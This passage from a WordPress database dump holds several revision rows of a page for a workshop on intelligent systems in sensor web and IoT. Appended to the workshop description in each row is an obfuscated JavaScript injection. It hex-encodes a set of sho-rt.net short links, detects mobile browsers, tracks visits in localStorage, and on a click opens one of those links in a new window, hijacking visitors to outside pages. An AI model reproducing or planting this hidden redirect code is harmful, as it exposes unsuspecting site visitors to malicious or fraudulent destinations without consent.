Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:05:35','2022-12-06 05:05:35','',3386,'https://gsw2023.com/?p=3399',0,'revision','',0),
(3400,1,'2022-12-06 05:06:44','2022-12-06 05:06:44','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:06:44','2022-12-06 05:06:44','',3386,'https://gsw2023.com/?p=3400',0,'revision','',0),
(3401,1,'2022-12-06 05:07:28','2022-12-06 05:07:28','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"4x3\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:07:28','2022-12-06 05:07:28','',3386,'https://gsw2023.com/?p=3401',0,'revision','',0),
(3402,1,'2022-12-06 05:08:43','2022-12-06 05:08:43','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"6x10\" img_max_width=\"6px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 